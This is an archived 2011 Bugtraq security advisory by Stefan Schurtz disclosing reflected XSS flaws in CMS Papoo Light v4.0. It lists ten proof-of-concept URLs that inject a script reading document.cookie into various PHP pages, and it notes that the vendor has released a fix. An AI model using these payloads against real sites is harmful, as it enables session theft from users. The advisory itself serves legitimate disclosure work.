lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 12 Sep 2011 13:35:25 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Multiple XSS vulnerabilities in CMS Papoo Light Version

Advisory:           Multiple XSS vulnerabilities in CMS Papoo Light Version
Advisory ID:        SSCHADV2011-014
Author:             Stefan Schurtz
Affected Software:  v4.0
Vendor URL:         http://www.papoo.de/
Vendor Status:      fixed
CVE-ID:             -

==========================
Vulnerability Description:
==========================

The CMS Papoo Light Version is prone to multiple XSS vulnerabilities

==================
Technical Details:
==================

http://<target>/papoo/papoo_light/index.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/kontakt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/inhalt.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/guestbook.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/account.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/login.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/index/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forumthread.php/"></a><script>alert(document.cookie);</script>
http://<target>/papoo/papoo_light/forum/"></a><script>alert(document.cookie);</script>

=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

12-Sep-2011 - informed the developers
12-Sep-2011 - release date of this security advisory
12-Sep-2011 - response and fix by vendor
12-sep-2011 - post on BugTraq

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.papoo.de/
http://www.rul3z.de/advisories/SSCHADV2011-014.txt

Powered by blists - more mailing lists